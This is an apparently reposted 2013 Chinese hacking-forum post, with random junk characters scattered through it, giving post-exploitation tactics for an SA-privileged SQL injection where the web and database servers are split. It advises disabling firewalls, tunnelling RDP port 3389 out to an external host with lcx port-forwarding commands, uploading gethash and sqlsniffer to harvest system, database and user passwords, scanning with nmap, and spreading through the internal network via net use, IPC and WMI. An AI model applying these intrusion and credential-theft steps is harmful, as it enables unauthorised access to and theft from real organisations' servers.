当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。" R$ m+ @! ~$ ?8 O6 V k ]
- R- L& N' x8 G! `% X; U/ `3 Q$ d" _, Q
* L5 S% A$ f7 m: a* u9 r2 P+ M( T! }SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
4 t3 C) l9 r; S* O' W' D
% _5 V' I$ j2 e/ @( C% U4 t
8 q( J3 y; z) P1 n6 b7 Y一、DB机有公网IP.
# ]( v: n7 j/ I8 g
' Y4 j* k9 D' j! q. m1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
4 t9 m* J; @( p% S- Z; r, K3 N
( r6 R. n ^( |& L- U% n
8 ~; F# K9 ^* K; R: B& U( K2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.+ C# z) X! k6 a
0 S* Y- J, r- [5 O" r
% q) Q: z% i w- g4 W' P! {) K* k
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com! ^# S- W& A6 R" G$ x9 T. k
: T3 t5 U- e8 D8 g \/ u$ T9 K
7 F0 e" r9 c$ f; j9 O
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.1 D2 s* y* F, Z" G
+ _1 X1 K y! N" N
* |" y5 w' B) f; T3 S
- a/ y2 h( y* P! o( [二、DB机只有内网IP* ?# C0 [9 r; S
8 f+ f/ K. E) B V' C
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
4 o: d$ w' C7 N: V" Y! w- g4 A" @3 O" b
( o2 J2 H( K) v( z
2:停掉防火墙和IP策略再从内往外扫描.- ?, M, b% X! [
7 h* x. u" k5 e) j3 k" k$ u+ m* P+ j& l% b
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.2 B+ X. z/ ?7 h! ~9 B) [
% `8 s7 ` X2 M# O2 O
y- o/ s/ m7 P0 S4 E4:学会密码规律分析往往会有惊喜.
7 o. Z: p+ _3 ~8 _' S2 v1 m
2 K9 w+ U3 P6 w% W0 Q }: K5 a& y% X( J( w* b
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
! w+ T- A4 y3 V
0 P7 c1 T! L0 N/ e6 x) ~7 p7 W8 [3 A. @9 x8 Z
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对